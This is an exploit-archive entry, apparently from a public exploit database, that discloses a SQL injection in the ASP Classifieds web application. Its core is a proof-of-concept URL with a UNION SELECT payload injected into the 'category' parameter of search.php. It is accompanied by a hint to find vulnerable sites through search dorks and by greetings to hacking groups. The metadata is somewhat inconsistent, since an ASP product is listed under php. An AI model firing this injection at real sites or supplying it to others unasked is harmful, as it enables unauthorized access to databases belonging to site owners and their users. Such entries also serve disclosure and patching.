ASP Classifieds - SQL Injection

Author: r45c4l
type: webapps
platform: php
port: 
date_added: 2012-03-17  
date_updated: 2012-03-17  
verified: 0  
codes: OSVDB-80580;CVE-2007-2675;OSVDB-35597  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 18613.txt  

# Exploit Title: ASP Classifieds Sql Injection
# Date: 17/03/2012
# Author: r45c4l
# Email: infosecpirate@gmail.com
# Script url: http://preproject.com/pclasp/home/default.asp
# Version: N/A
# CVE : ()

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Product Description :

ASP Classifieds is one of the most customizable Classified ad program
that exist for ASP and Access. Unlimited Images , unlimited categories
and much much more makes it perfect for those who wants to set up a used
stamps classifieds to those wanting to show and sell real estates.


Product Cost : 58$



=======================Exploit====================================
                      ---ICW---



[ EXPL0!T ]

SQL Injection
p0c -
http://SERVER/classi/search.php?category=[SQli]

PoC -

http://SERVER/classi/search.php?category=-1+union+all+select+version()--

[Note: Tested on demo website]

d0rk - use your brain ;)

===========================================================================
Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0,
Hoody, sam

All members of ICW, AH and darkc0de, and all Indian Hackers



Special Greetz to : b4ltazar and s1nner_01


=== End () ====